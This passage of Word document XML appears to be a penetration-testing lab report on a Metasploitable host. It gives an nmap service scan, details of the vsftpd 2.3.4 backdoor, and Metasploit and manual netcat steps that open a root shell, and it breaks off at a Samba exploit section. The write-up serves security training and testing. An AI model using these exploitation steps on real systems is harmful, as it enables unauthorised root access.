          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="389C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544119D2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5E2BA817">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3D83AA44">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OpenSSH 4.7p1 Debian 8ubuntu1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="352F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5FA8E1FE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>23/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7DE0020E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5263F351">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Linux telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="56CB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6C5EEA12">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>25/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="17564FA1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>smtp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="43993368">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Postfix smtpd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7EC4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4A31DE11">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="159A7CDF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="11784CEE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache httpd 2.2.8 (Ubuntu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7E78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23CA9BAC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>139/445/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7484394E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>netbios-ssn / smb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="37E586A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Samba smbd 3.X – 4.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7BD0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35FCA1F5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1524/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="03CBB87A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>bindshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="58677708">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploitable root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7ACA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5BEF03E1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3306/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0A2D838A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="21984322">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22FA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3405C8CC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5432/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="256A16B2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>postgresql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D1C43EE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PostgreSQL DB 8.3.0-8.3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1DE0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Pr>
          <w:p w14:paraId="73919648">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6667/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4055802C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>irc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E918DCD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C3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Pr>
          <w:p w14:paraId="45E9ACEF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8180/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="793F466F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5D205D10">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache Tomcat/Coyote JSP 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="616B98DD">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0053D53C">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A targeted vulnerability scan was then run to narrow down exploitable services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C950A10">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nmap --script vuln -T4 -p 21,22,23,25,80,139,445,3306,5432,6667,8180 192.168.56.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CFE83E">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The vsftpd 2.3.4 service on port 21 was selected as the primary exploitation target due to its well-documented, high-severity backdoor vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1199EB44">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>5. Phase 3: Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4225FF0B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>5.1 Vulnerability Details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1548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57CEC96">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DC8D5DD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4 (FTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1CC4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125317C4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CVE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08D51CDB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5888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3DD7F4F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Vulnerability Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B5EE09F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Malicious backdoor / Unauthenticated Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3969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2240AFB0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="339B0992">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="59A3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3AE088BB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="782E84C4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>The vsftpd 2.3.4 source package distributed between June 30 and July 3, 2011 was compromised by an attacker who inserted a backdoor. Sending the string "user:)" as the FTP username triggers the backdoor, which opens a root shell listener on TCP port 6200.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="309233E3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>5.2 Exploitation Attempt – Metasploit Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028ED450">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Metasploit Framework module for this vulnerability was attempted first:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1D746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msfconsole</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search vsftpd</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.56.106</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set LHOST 192.168.56.101</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B34463">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit correctly fingerprinted the target as vulnerable (“FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)”, “backdoor may be present”) but repeated automated attempts failed to establish a session, returning “Unable to connect to backdoor on 6200/TCP. Cooldown?”. This is a known reliability issue with this specific module, where automated timing does not always align with the backdoor’s trigger window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0F5FE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>5.3 Exploitation – Manual Method (Successful)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067DFBC2">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Given the automated module's inconsistency, the backdoor was triggered manually using two terminal sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3988C3AC">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Terminal 1 – trigger the backdoor via FTP login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDB9F8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ftp 192.168.56.106</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Name: user:)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[connection drops – this is expected; the trigger has fired]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFC6A15">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Terminal 2 – connect to the root shell opened on port 6200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B72CAA">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nc 192.168.56.106 6200</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010CF76">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The manual trigger succeeded, returning an unauthenticated root shell on the target system. This confirms the vulnerability is genuinely exploitable and that the earlier Metasploit failures were a tooling/timing issue rather than a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12074E32">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>5.4 Second Vulnerability – Samba “usermap_script” Remote Code Execution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13C3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4617FD8A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
